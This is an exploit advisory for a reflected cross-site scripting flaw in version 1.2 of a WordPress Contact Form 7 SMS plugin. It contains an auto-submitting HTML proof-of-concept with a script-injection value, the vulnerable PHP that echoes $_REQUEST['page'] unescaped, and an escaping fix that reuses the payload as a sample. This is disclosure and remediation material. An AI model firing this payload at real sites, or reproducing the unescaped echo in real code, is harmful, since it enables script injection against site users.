Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting

2017.09.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

___________________________________________________
|
| Exploit Title: Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage : https://wordpress.org/plugins/cf7-international-sms-integration/
| Software Link: https://downloads.wordpress.org/plugin/cf7-international-sms-integration.1.2.zip
| Version: 1.2
| Date: 2017 - 07 - 9
| Tested on: Kali-Linux /FireFox
|__________________________________________________

Exploit :

<html>
<body onload="document.exploit.submit()">
<form id="smslog-filter" method="get" action="http://Target/PATH/wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php ">
<input type="hidden" name="page" value=""/><script>alert(1)</script>" />
<input type="hidden" name="tab" value="smslogs" />
</form>
</body>
</html>
__________________________________________________

Vulnerable method : $_GET
Vulnerable File : wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php

Vulnerable code (line 366):

<form id="smslog-filter" method="get" action="<?php echo $current_url; ?> ">
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
<input type="hidden" name="tab" value="smslogs" />
<?php $testListTable->display() ?>
</form>
__________________________________________________

#patch: To fix this vulnerability, escape the request value with the htmlspecialchars() function before echoing it into the attribute.
__________________________________________________

Discovered By : M.R.S.L.Y
__________________________________________________
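The fix the advisory recommends, shown as an added example that is not the plugin's own code: the hidden "page" input is rendered once the way line 366 does it and once with the value escaped for an HTML attribute context. The function names and the sample input are constructed for this illustration.

```php
<?php
// Added example, not code from the cf7-international-sms-integration plugin.
// Both functions are hypothetical stand-ins for the echo on line 366 of
// class-sms-log-display.php.

// Vulnerable form: the request value goes straight into the attribute, so a
// double quote in it closes value="..." and the rest is parsed as markup.
function render_page_input_vulnerable(string $page): string
{
    return '<input type="hidden" name="page" value="' . $page . '" />';
}

// Fixed form: htmlspecialchars() turns ", <, > and & into entities so the
// browser keeps the whole value inside the attribute. ENT_QUOTES also
// encodes single quotes (needed if the attribute were single-quoted) and the
// explicit charset prevents mis-decoding of the input. Inside a WordPress
// plugin the usual wrapper for this is esc_attr(), which does the same job.
function render_page_input_fixed(string $page): string
{
    $safe = htmlspecialchars($page, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="page" value="' . $safe . '" />';
}

// Constructed sample in the shape of the "page" value from the advisory's PoC.
$sample = '"/><script>alert(1)</script>';

echo render_page_input_vulnerable($sample), PHP_EOL;
echo render_page_input_fixed($sample), PHP_EOL;
```

Run it with `php` on the command line and compare the two lines: only the first one contains a live `<script>` element. The same escaping belongs on every other request-derived value printed into that template, including `$current_url` if it is built from the request.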


Copyright 2017, cxsecurity.com